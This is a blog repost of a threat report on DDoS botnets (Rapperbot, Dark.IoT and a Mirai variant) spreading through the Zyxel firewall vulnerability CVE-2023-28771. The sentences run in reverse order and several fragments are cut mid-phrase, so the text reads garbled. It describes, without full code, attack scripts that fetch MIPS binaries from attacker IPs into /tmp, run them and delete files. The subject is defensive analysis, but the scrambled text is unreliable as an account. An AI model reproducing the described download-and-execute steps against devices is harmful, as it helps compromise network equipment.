![]() ![]() Taking proactive measures to ensure the security of these devices is highly recommended. To effectively address this threat, it is crucial to prioritize the application of patches and updates whenever possible. ![]() Once an attacker gains control over a vulnerable device, they can incorporate it into their botnet, enabling them to execute additional attacks, such as DDoS. The presence of exposed vulnerabilities in devices can lead to significant risks. Targeting vulnerable devices has always been a primary objective for threat actors, and the prevalence of remote code execution attacks poses a major concern for IoT devices and Linux servers. In the following sections, we introduce the botnets we have identified as spreading via CVE-2023-28771 over the past month. It appears that this campaign utilized multiple servers to launch attacks and updated itself within a few days to maximize the compromise of Zyxel devices. Notably, the execution files display resemblances. zw" file from the temporary folder and save the current file as " /tmp/a". These scripts employ the " rm -rf" command to remove the ". The script files in Figure 5 exhibit similar code patterns despite originating from different server IP addresses. However, we observed this script being forwarded to 1712213618, where it dropped additional MIPS files for subsequent actions. The script file shown in Figure 4 was downloaded from 1712213615, which has been associated with the Rapperbot malware. Subsequently, it executes with the "zywall" parameter indicating its connection to the Zyxel firewall vulnerability. In Figure 3, the script downloads a file named " lolmips" from the IP address 921183916 and saves it as ". ![]() The script files obtained in these attacks exclusively download files tailored for the MIPS architecture, indicating a highly specific target. In this article, we will provide a detailed explanation of the payload delivered through CVE-2023-28771 and associated botnets. We also identified multiple botnets, including Dark.IoT, a variant based on Mirai, as well as another botnet that employs customized DDoS attack methods. Analysis conducted by FortiGuard Labs has identified a significant increase in attack bursts starting from May, as depicted in the trigger count graph shown in Figure 1. Since the publication of the exploit module, there has been a sustained surge in malicious activity. Through the capture of exploit traffic, the attacker's IP address was identified, and it was determined that the attacks were occurring in multiple regions, including Central America, North America, East Asia, and South Asia. Subsequently, the Cybersecurity and Infrastructure Security Agency (CISA) added this security flaw to its Known Exploited Vulnerabilities (KEV) catalog in May. Zyxel released a security advisory regarding this vulnerability on April 25, 2023. The severity of this flaw, rated 9.8 on the CVSS scoring system, was reported by researchers from TRAPA Security. This vulnerability is characterized by a command injection flaw affecting multiple firewall models that could potentially allow an unauthorized attacker to execute arbitrary code by sending a specifically crafted packet to the targeted device. In June 2023, FortiGuard Labs detected the propagation of several DDoS botnets exploiting the Zyxel vulnerability ( CVE-2023-28771 ). Impact: Remote attackers gain control of the vulnerable systems ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |